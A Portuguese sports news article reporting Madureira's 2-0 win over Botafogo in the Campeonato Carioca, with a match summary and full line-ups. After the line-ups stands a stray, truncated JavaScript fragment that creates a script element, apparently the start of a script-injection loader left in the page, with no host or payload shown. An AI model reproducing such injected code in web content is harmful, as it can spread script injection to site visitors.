Madureira apaga o Fogão

Time comandado por Jair Ventura deixou a desejar e terá de melhorar para a estreia na Libertadores, na próxima quarta-feira. Foto: Vitor Silva/SSPress/Botafogo

Em jogo antecipado da segunda rodada do Campeonato Carioca, o Botafogo foi derrotado pelo Madureira por 2 x 0, na estreia das duas equipes na competição. A partida foi disputada na tarde desta quarta-feira (25), em Moça Bonita e o resultado fez a equipe de Conselheiro Galvão conquistar os primeiros três pontos na competição. Os gols foram marcados por Souza e Geovane Maranhão, ambos no segundo tempo.

O Botafogo, que precisou antecipar o confronto em função dos compromissos na Libertadores, promoveu a estreia oficial de Montillo e Roger, mas acabou decepcionando a sua torcida que enfrentou o forte calor de Bangu para prestigiar a equipe de General Severiano.

O time alvinegro cometeu muitos erros de finalização e enfrentou um adversário bem armado. O time dirigido por PC Gusmão soube aproveitar os espaços para construir sua primeira vitória no campeonato.

O Botafogo volta a jogar pelo Campeonato Carioca neste sábado, diante do Nova Iguaçu, no Engenhão. O Madureira vai encarar o Macaé, no Eduardo Guinle.

FICHA TÉCNICA

Local: Estádio Moça Bonita, no Rio de Janeiro (RJ)

Árbitro: Luiz Antonio Silva dos Santos 

Gols: Souza, aos 24 e Geovane Maranhão, aos 33 minutos do segundo tempo

MADUREIRA: Rafael Santos; Ruan, Diego Guerra, Jorge Filipe e Wellington Saci; William, Leandro Carvalho, Bruno(Souza) e Douglas Lima(Geovane Maranhão); Luciano Naninho e Julio Cesar.

Técnico: PC Gusmão

BOTAFOGO: Gatito Fernandez; Jonas, Emerson Silva, Renan Fonseca e Victor Luis; Airton (Sassá), Rodrigo Lindoso (Leandrinho), Bruno Silva e Montillo; Rodrigo Pimpão(Vinicius Tanque) e Roger.

Técnico: Jair Ventura

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário